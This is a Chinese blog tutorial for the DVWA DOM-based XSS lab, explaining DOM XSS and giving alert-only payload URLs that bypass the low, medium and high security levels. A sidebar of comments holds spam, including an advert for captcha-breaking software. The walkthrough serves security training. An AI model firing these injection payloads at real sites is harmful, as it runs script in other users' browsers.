DVWA XSS (DOM) 通关教程

DOM型XSS

DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。

DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。

在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说,客户端的脚本程序可以通过DOM来动态修改页面内容,从客户端获取DOM中的数据并在本地执行。基于这个特性,就可以利用JS脚本来实现XSS漏洞的利用。

可能触发DOM型XSS的属性:

document.referer属性

window.name属性

location属性

innerHTML属性

documen.write属性

Low Security Level

Exploit

http://www.dvwa.com/vulnerabilities/xss_d/?default=English<script>alert(/xss/);</script>

Medium Security Level

Exploit

http://www.dvwa.com/vulnerabilities/xss_d/?default=English>/option></select><img src=1 onerror=alert(/xss/)>

High Security Level

Exploit

http://www.dvwa.com/vulnerabilities/xss_d/?default=English #<script>alert(/xss/)</script>

扫码支持
扫码打赏,你说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

标签:

分享到:

扫一扫在手机阅读

扫一扫 在手机阅读、分享本文

上一篇: 下一篇:

还没有评论,快来抢沙发!

电子邮件地址不会被公开。 必填项已用*标注

loading

90后web菜鸟,互联网小白~
喜欢领域:编程|代码审计|web安全

最新评论

  • cheapest cialis 20mg
    Heya i'm for the first time here. I found this board and I to find It really useful & it helped me out much. I'm hoping to offer something again and aid others such as you aided me.
    发表在:YII2.0 开发基础学习笔记(二)
  • FernandoBold
    I have checked your page and i have found some duplicate content, that's why you don't rank high in google, but there is a tool that can help you to create 100% unique articles, search for: SSundee advices unlimited content for your blog
    发表在:DVWA XSS (Reflected) 通关教程
  • Z
    请问为什么sql注入使用' or 1=1 #不行呢?
    发表在:DVWA Brute Force通关教程
  • Helenfug
    Absolutely NEW update of SEO/SMM package "XRumer 16.0 + XEvil": captcha breaking of Google (ReCaptcha-2 and ReCaptcha-3), Facebook, BitFinex, Bing, Hotmail, SolveMedia, Yandex, and more than 8400 another types of captcha, with highest precision (80..100%) and highest speed (100 img per second). You can use XEvil 4.0 with any most popular SEO/SMM software: iMacros, XRumer, GSA SER, ZennoPoster, Srapebox, Senuke, and more than 100 of other software. Interested? There are a lot of impessive videos about XEvil in YouTube. FREE DEMO AVAILABLE! Good luck ;)
    发表在:PHP代码审计归纳[转载]
  • feng
    okok,已更新链接,感谢通知
    发表在:Python脚本|根据URL生成特定目标网站备份文件猜测字典